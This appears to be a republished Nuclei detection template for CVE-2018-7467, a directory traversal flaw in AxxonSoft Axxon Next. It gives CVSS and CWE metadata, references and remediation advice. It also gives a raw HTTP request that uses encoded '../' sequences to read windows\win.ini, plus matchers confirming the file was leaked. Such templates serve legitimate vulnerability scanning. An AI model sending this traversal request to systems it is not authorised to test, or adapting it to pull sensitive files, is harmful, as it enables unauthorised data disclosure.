CVE-2018-7467: AxxonSoft Axxon Next - Local File Inclusion

2025-08-01 AxxonSoft Axxon Next PoC Public

Description

AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.

PoC

id: CVE-2018-7467

info:
  name: AxxonSoft Axxon Next - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.
  impact: |
    An attacker can read sensitive files, execute arbitrary code, or launch further attacks.
  remediation: |
    Apply the latest security patches or updates provided by AxxonSoft to fix the local file inclusion vulnerability.
  reference:
    - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html
    - https://github.com/sullo/advisory-archives/blob/master/axxonsoft-next-CVE-2018-7467.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7467
    - http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-7467
    cwe-id: CWE-22
    epss-score: 0.10169
    epss-percentile: 0.95415
    cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: axxonsoft
    product: next
  tags: cve,cve2018,axxonsoft,lfi,packetstorm,vuln

http:
  - raw:
      - |+
        GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a00483046022100cf9afa424a00ec272e2842279768ac0f87065eda7cc79a2f1f2111af438daa25022100e5be7a91603cc40f46848899486d704eb85e1a9db90e0b70e8b30d418e54f40f:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities